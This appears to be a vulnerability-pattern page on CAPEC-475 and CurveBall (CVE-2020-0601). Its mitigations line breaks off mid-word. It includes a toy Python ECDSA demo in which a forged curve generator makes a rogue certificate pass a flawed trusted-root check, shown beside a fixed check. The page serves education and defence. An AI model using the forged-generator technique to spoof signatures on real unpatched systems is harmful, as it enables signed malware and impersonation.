An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.
Prerequisites:
- Recipient is using a weak cryptographic signature verification algorithm or a weak implementation of a cryptographic signature verification algorithm, or the configuration of the recipient's application accepts the use of keys generated using cryptographically weak signature verification algorithms.
Skills Required:
[High] Cryptanalysis of signature verification algorithm
[High] Reverse engineering and cryptanalysis of signature verification algorithm implementation
Mitigations:
- Use programs and products that contain cryptographic elements that have been thorou
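The pattern CAPEC-475 describes is the one the CurveBall proof-of-concept listed in this page's references exercises against Crypt32.dll: the verifier matched a certificate to a cached trusted root by public key alone and then verified the signature under the explicit curve parameters, generator included, that the attacker's certificate itself supplied. The block below is an added example, not code from this page, the CAPEC entry, Microsoft or the PoC authors. It is a toy ECDSA verifier over P-256 in pure Python that shows the flawed check beside the corrected one. The certificate layout (a dict of issuer public key, parameter block, payload and signature), the trust store keyed by public key, the choice of attacker private key and the payload bytes are constructed assumptions; the curve arithmetic is textbook affine ECDSA and is neither constant-time nor suitable for production use.

```python
"""
Toy reproduction of the CVE-2020-0601 (CurveBall) verification flaw on P-256.
Added example; certificate layout, trust store shape and payload are assumptions.
"""
import hashlib
import secrets

# NIST P-256 domain parameters (public constants)
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
GX = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
GY = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
P256 = {"p": P, "a": A, "b": B, "G": (GX, GY), "n": N}


def ec_add(p1, p2):
    """Affine point addition; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, pt):
    """Double-and-add scalar multiplication (not constant-time)."""
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc


def hash_msg(msg: bytes) -> int:
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N


def ecdsa_sign(d, msg, curve):
    """ECDSA over whatever generator the parameter block names."""
    e = hash_msg(msg)
    # deterministic nonce so runs are reproducible (use RFC 6979 in real code)
    k = int.from_bytes(hashlib.sha256(d.to_bytes(32, "big") + msg).digest(), "big") % N or 1
    r = ec_mul(k, curve["G"])[0] % N
    s = pow(k, -1, N) * (e + r * d) % N
    return (r, s)


def ecdsa_verify(Q, sig, msg, curve):
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    e, w = hash_msg(msg), pow(s, -1, N)
    R = ec_add(ec_mul(e * w % N, curve["G"]), ec_mul(r * w % N, Q))
    return R is not None and R[0] % N == r


# Trusted root: the CA keeps d_root; the verifier's store holds only Q_ROOT.
# Keying the store by public key alone mirrors the flawed Crypt32 root cache.
d_root = secrets.randbelow(N - 1) + 1
Q_ROOT = ec_mul(d_root, P256["G"])
TRUSTED_ROOTS = {Q_ROOT: P256}  # root public key -> its named curve


def build_rogue_cert(Q_target, msg):
    """Attacker: pick any d', set G' = d'^-1 * Q_target so that d' * G' == Q_target.
    The attacker never learns d_root; it only needs the public point."""
    d_evil = 2  # assumed attacker private key; any value in [1, N-1] works
    G_evil = ec_mul(pow(d_evil, -1, N), Q_target)
    rogue_curve = dict(P256, G=G_evil)  # explicit parameters with a forged generator
    return {"pubkey": Q_target, "params": rogue_curve,
            "payload": msg, "sig": ecdsa_sign(d_evil, msg, rogue_curve)}


def verify_vulnerable(cert):
    """Flawed check: trust is decided by public-key match alone, then the
    signature is verified under the parameters the certificate supplies."""
    if cert["pubkey"] not in TRUSTED_ROOTS:
        return False
    return ecdsa_verify(cert["pubkey"], cert["sig"], cert["payload"], cert["params"])


def verify_fixed(cert):
    """Fix: the domain parameters are part of the key's identity. A key matched to
    a trusted root must also carry that root's curve (p, a, b, G, n), so G' is rejected."""
    trusted_curve = TRUSTED_ROOTS.get(cert["pubkey"])
    if trusted_curve is None or cert["params"] != trusted_curve:
        return False
    return ecdsa_verify(cert["pubkey"], cert["sig"], cert["payload"], trusted_curve)


def demo():
    msg = b"malicious.exe (constructed sample payload)"
    rogue = build_rogue_cert(Q_ROOT, msg)
    genuine = {"pubkey": Q_ROOT, "params": P256, "payload": msg,
               "sig": ecdsa_sign(d_root, msg, P256)}
    return {"rogue_vulnerable": verify_vulnerable(rogue),  # True: spoof accepted
            "rogue_fixed": verify_fixed(rogue),            # False
            "genuine_fixed": verify_fixed(genuine)}        # True


if __name__ == "__main__":
    print(demo())
```

`demo()` returns the three verdicts: the rogue certificate passes the vulnerable check and fails the fixed one, while the genuine root-signed certificate still passes. The defensive point sits in `verify_fixed`: a public-key match is only meaningful when every domain parameter, the generator included, equals the trusted root's named curve; the simplest hardening, and what the patched CryptoAPI effectively enforces, is to refuse explicit parameters on a root match outright rather than compare them.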
References:
- http://packetstormsecurity.com/files/155960/CurveBall-Microsoft-Windows-CryptoAPI-Spoofing-Proof-Of-Concept.html
- http://packetstormsecurity.com/files/155961/CurveBall-Microsoft-Windows-CryptoAPI-Spoofing-Proof-Of-Concept.html
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-0601
Timeline:
- Published: 2020-01-14
- Added to CISA KEV: 2021-11-03
- Exploited in the wild